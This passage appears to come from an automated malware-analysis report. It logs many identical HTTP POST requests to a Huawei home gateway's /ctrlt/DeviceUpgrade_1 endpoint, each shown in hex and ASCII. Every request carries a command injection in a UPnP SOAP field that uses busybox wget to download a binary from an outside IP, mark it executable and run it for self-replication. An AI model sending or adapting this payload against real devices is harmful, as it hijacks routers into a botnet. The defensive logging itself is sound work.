/tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 456Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 